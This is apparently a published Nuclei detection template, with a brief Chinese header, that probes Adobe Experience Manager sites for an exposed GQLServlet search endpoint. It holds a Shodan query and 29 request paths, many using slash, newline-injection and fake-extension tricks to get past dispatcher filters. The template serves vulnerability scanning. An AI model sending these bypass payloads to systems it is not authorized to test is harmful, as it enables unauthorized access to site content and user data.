漏洞描述
AEM GQLServlet is exposed.
aem-gql-servlet: AEM GQLServlet
PoC代码[已公开]
id: aem-gql-servlet
info:
name: AEM GQLServlet
author: dhiyaneshDk,prettyboyaaditya
severity: low
description: AEM GQLServlet is exposed.
reference:
- https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html
classification:
cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 29
vendor: adobe
product: experience_manager
shodan-query: http.component:"Adobe Experience Manager"
tags: aem,misconfig,vuln
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
- "/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix="
- "/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'excerpt'
- 'path'
- 'hits'
condition: and
# digest: 4b0a00483046022100975a76259879928d65d7a4bf42bb76bc91ac1b5f5bcf56782733801b580b4556022100e2ed9d61c3a8a7def79fba7e2e0c56d4bd59eabd957f662602e9edb98fa84a3c:922c64590222798bb761d5b6d8e72950